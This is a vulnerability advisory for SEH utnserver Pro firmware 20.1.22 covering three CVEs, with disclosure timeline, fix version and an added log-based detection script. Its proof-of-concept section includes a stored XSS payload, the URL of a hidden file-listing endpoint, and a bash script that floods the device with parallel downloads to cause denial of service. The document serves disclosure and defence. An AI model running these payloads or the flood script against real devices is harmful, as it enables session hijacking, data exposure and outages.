[EN] Multiple Vulnerabilities in SEH utnserver Pro
Title: Multiple Vulnerabilities
Product: SEH utnserver Pro
Vulnerable version: 20.1.22
Fixed version: 20.1.28
CVE: CVE-2024-5420, CVE-2024-5421, CVE-2024-5422
Impact: High
Homepage: https://www.seh-technology.com/
Found: 2024-03-04
The utnserver Pro is prone to stored cross-site scripting, file disclosure and denial-of-service attacks. This allows an attacker to deactivate the device or place malicious code in the web interface of the utnserver.
Vendor description
We are SEH from Bielefeld – manufacturer of high-quality network solutions. With over 35 years of experience in the fields of printing and networks, we offer our customers a broad and high-level expertise in solutions for all types of business environments.
Source: https://www.seh-technology.com/us/company/about-us.html
Vulnerable versions
utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22
Vulnerability overview
1) Stored Cross-Site Scripting (CVE-2024-5420)
A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. Multiple parameters, e.g. the device description, can be abused to inject JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.
2) Authenticated File Disclosure (CVE-2024-5421)
Files and content of directories can be disclosed by integrated functions of the device.
3) Denial of Service (CVE-2024-5422)
A Denial-of-Service vulnerability has been identified in the web interface of the device. It can be triggered by sending a large number of requests that cause serial interface access on the device.
Proof of Concept
1) Stored Cross-Site Scripting (CVE-2024-5420)
By accessing the following URL, an attacker can modify the device description:
http://$IP/device/description_en.html
By using a malicious JavaScript payload, it is possible to execute arbitrary JavaScript in the browser of a user who views the description. This snippet demonstrates such a payload:
"><script>alert(document.location)</script>
Saving this text as the device description leads to persistent cross-site scripting. As a result, everyone who opens the device description executes the injected code in the context of their own browser.
2) Authenticated File Disclosure (CVE-2024-5421)
A hidden function in the web interface of the device can be used to disclose directories and files at operating-system level. The function can be accessed directly via the browser:
http://$IP/info/dir?/
This lists the contents of the given directory and offers its files for download.
3) Denial of Service (CVE-2024-5422)
To trigger a denial of service on the device, multiple file descriptors are opened by the following script (usage: ./script.sh <device IP> <number of requests>):
#!/bin/bash
# $1: IP address of the device, $2: number of download requests to issue
echo "Parameters: $1 $2"
last_iter=$(($2 - 1))
for ((i=1; i<=$2; i++))
do
echo "[$i] Downloading application binary"
if [[ "$i" == "$last_iter" ]];then
# one request is run in the foreground, all others in parallel in the background
curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null
else
curl http://$1/info/file?/application --output ./file_${i}.txt &> /dev/null &
fi
done
The vulnerabilities were manually tested on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com) and verified on a real device.
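As an added defender-side example (not part of the CyberDanube advisory), the following Python flags, in access logs collected from a reverse proxy or the device's web interface, the two patterns that are observable on the server side: any hit on the hidden /info/dir listing endpoint, and a burst of /info/file downloads from one source, which is the traffic the script above produces. The log lines, the burst threshold and the time window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (common log format); not taken from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jun/2024:10:00:01 +0000] "GET /device/description_en.html HTTP/1.1" 200 812
10.0.0.5 - - [04/Jun/2024:10:00:04 +0000] "GET /info/file?/application HTTP/1.1" 200 1048576
10.0.0.9 - - [04/Jun/2024:10:00:02 +0000] "GET /info/dir?/ HTTP/1.1" 200 4096
10.0.0.9 - - [04/Jun/2024:10:00:03 +0000] "GET /info/file?/application HTTP/1.1" 200 1048576
10.0.0.9 - - [04/Jun/2024:10:00:03 +0000] "GET /info/file?/application HTTP/1.1" 200 1048576
10.0.0.9 - - [04/Jun/2024:10:00:04 +0000] "GET /info/file?/application HTTP/1.1" 200 1048576
10.0.0.9 - - [04/Jun/2024:10:00:04 +0000] "GET /info/file?/application HTTP/1.1" 200 1048576
10.0.0.9 - - [04/Jun/2024:10:00:05 +0000] "GET /info/file?/application HTTP/1.1" 200 1048576
""".splitlines()

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(lines):
    """Yield (ip, timestamp, path) for every line that matches the log format."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m["ip"], datetime.strptime(m["ts"], TS_FMT), m["path"]


def find_indicators(lines, burst_threshold=5, window=timedelta(seconds=10)):
    """Flag any hit on the hidden /info/dir listing and any burst of /info/file
    downloads from one source (the pattern the DoS script produces).
    The threshold and window are assumptions, not values from the advisory."""
    alerts = []
    file_hits = defaultdict(list)
    for ip, ts, path in parse(lines):
        if path.startswith("/info/dir"):
            alerts.append(("file-disclosure-probe", ip, path))
        elif path.startswith("/info/file"):
            file_hits[ip].append(ts)
    for ip, times in file_hits.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= burst_threshold:
                alerts.append(("dos-burst", ip,
                               f"{end - start + 1} /info/file requests within {window.seconds}s"))
                break
    return alerts
```

Calling find_indicators(SAMPLE_LOG) reports the directory-listing probe and the download burst from 10.0.0.9, while the single download from 10.0.0.5 stays below the threshold.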
Solution
Install firmware version 20.1.28 to fix the vulnerabilities.
Workaround
None
Recommendation
CyberDanube recommends that SEH Computertechnik customers upgrade the firmware to the latest version available.
Contact Timeline
- 2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent advisory to support.
- 2024-03-20: Asked for an update. Contact stated that an internal timeline will be defined.
- 2024-04-10: Asked for an update. Contact stated that the vulnerabilities will be patched soon.
- 2024-04-16: Contact sent link to patched firmware release candidate.
- 2024-05-31: Notified SEH Computertechnik that the advisory will be released in the first week of June. Received confirmation from SEH Computertechnik.
- 2024-06-04: Coordinated release of security advisory.
Author
Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware; today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM (international). Nowadays, he brings his competence and experience into security products.